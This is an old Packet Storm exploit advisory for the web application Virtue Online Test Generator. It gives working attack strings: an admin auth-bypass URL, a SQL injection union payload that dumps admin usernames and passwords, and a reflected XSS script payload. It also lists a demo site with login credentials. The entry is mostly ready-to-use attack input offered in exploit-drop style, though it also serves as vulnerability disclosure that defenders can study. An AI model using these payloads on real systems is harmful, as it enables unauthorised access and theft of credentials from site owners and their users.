Virtue Online Test Generator XSS / SQL Injection

2009-06-26T00:00:00
ID PACKETSTORM:78679
Type packetstorm
Reporter HxH
Modified 2009-06-26T00:00:00

Description

                                        
                                            `+===================================================================================+  
| |  
| Virtue Online Test Generator (AB/SQL/XSS) Multiple Remote Vulnerabilities |  
| |  
+===================================================================================+  
| |  
| Author.: HxH |  
| Contact: HxH[at]live[dot]at |  
| |  
+===================================================================================+  
| |  
| Script.: Virtue Online Test Generator |  
| Home...: http://www.virtuenetz.com/virtue_test_generator.php |  
| |  
+-----------------------------------------------------------------------------------+  
| |  
| Exploit: After user login |  
| |  
| [+] Auth Bypass |  
| |  
| http://[website]/[script]/admin/index.php |  
| |  
| [+] SQLi |  
| |  
| http://[website]/[script]/text.php?tid=[SQL] |  
| |  
| [SQL]=null+union+select+1,2,concat(user_name,0x3a,user_pass)+from+admin-- |  
| |  
| [+] XSS |  
| |  
| http://[website]/[script]/text.php?tid=<script>alert(1)</script> |  
| |  
+-----------------------------------------------------------------------------------+  
| |  
| Demo...: http://www.virtuenetz.com/exam |  
| Usrinfo: E-mail:demo@virtuenetz.com ~ Pass:demo |  
| |  
+===================================================================================+  
| |  
| Greetz.: ~ Jiko ~ Sniper Code ~ T3rr0rist |  
| |  
+===================================================================================+  
  
  
`